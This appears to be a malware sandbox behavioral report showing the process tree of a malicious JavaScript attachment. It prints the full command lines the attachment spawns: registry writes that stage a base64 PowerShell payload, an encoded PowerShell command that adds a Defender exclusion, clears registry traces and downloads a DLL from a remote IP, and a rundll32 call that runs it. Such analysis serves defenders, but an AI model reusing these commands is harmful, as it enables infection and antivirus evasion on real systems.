| ZeroBOX

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Attachment-GAKND(28).js
2556
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\VicariousPluton /v isatine /d CfCuLyndhuohVhHxOHrXeXrWuuaJOOAcwxwmDjhFeIdivrzKrgukrxouNzGqOujwhqzAoxkutLnKiyVdvADKphHFrTjVxRjpSwIgOUepydHTopBGXHiwNpKGwgxhWLrYEKnppsCAlQsxWIdCapIslWOwbldEMdiPprvvzpWNLqYAxilvFQtyBlfxYrKbHKsOARoIYpjcEkpHRSwFrqHBhiiIKHGPgJANDGJmXETGkrqAubmuTuzZZdYDEwMVZxOjHYImTqWwlSbSgOIksGmrgsWWOtdXjqEMu
  2736
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v maliceproof /d AcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
  2808
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v Immeritous /d PiiFCMkkXclVXbmwWThiQHRYByeJiwvqfDzjjRQfrrxMxrhOOpuHOUAKGykrqmXvCtXiEWRIhWxCmopITwlPKxzkfiIJLdxlUOALfUsBGPcDqeIilmRbociRsfJEyW
  2900
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v physiocratistSexological /d jzgTeLWOUcsqGmuEncfqSiyACQZsRAnUmuNJmgCzyxQeiJHHUIiXJGVYZnDvzstXXjAzkztvvATBNfhwfzMMrJbelMHDSDHXQgnDGgZTKzqqOsGPWdzfcccJdBZlQtFxJxHEFmGlVQlkzKXkscYuksoiUOUHVcfOblElwgBJPxODcHgdgWDCulOsfemhRpDZVUzxAkzdpEjTuIpNeoPnJJsvUlOqfWmHQNBidfIGSAEzywxQZjfoQEWDchRsloLDdfUGOnYhEsjguGYwufydFepUQgOgUCaRdsHSsHWOWibzvmhQIlpKwOUPtPfBFCQqOYlrGlcXUuGPwKGkXUWUqPTeCiNonZEWTvDPVmAnTOFatlxsQeFxXXzaUGCUeJPRCRDiBccAGUpjUKAZHFYyqcxrTKNenNYaxzkeAnKSuflwrSPDtEpxOtTxmZtoDQ
  2996
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v epicuticle /d YMuhZoVzcidWxeZuPNTnkynxFHcEegOxrmsBtVSjXxechqdqQLeAiKDMNcFIlSdqZgjWpDTroVjsXSquKpRMTtOIToPucQjhWoIRsHunvHgXbrBWHAWLgBtZPuqYWncoVBczOUNQJrLaRMoewvIjBDgsLGhwYMbtFRmyWWEyGHOjkzUiNaolBvAsUjOhMhiHItrIPpTyMLvTvpPWdPZKawZNzmmMmKqAqKjuxUxxhyGypTkntNSfUmbkhfuDAZVndNxsxDLZevGCWMtdstzjKLRJlugyWGKYcujicpqGVKrBfdkPEcaXCJLHZxZtzIKXlhRwPqxkyLkkYfcHXYTZcbCirjuVpfAREiUxagjLqkOAsIksTIIoCZrRepvOUkILAawfgycNHPVWXEDLbqwrkcAuZWrVsdJUZWuUfrIoVSumAxlrafpMOMqShjofveKLPVcAMfviQzTVv
  744
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v SexisyllableCommandos /d AlrexpwMNIxFAedbHwwSzzZHUahyniRudIjrUwHoROxwvSIzzxsBWkGSUJMvsxdWyabHWlHXJQSymtyXbIpHbQpO
  2112
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $CondiddlingDeliberatively = Get-ItemProperty -Path HKCU:\SOFTWARE\CondiddlingDeliberatively | %{$_.maliceproof}; powershell -windowstyle Minimized -encodedcommand "JABNAGUAYQBnAGU$CondiddlingDeliberatively"
  2220
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
    2552
    - rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\\voidablenessUnfile.dll RS32
      2356

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents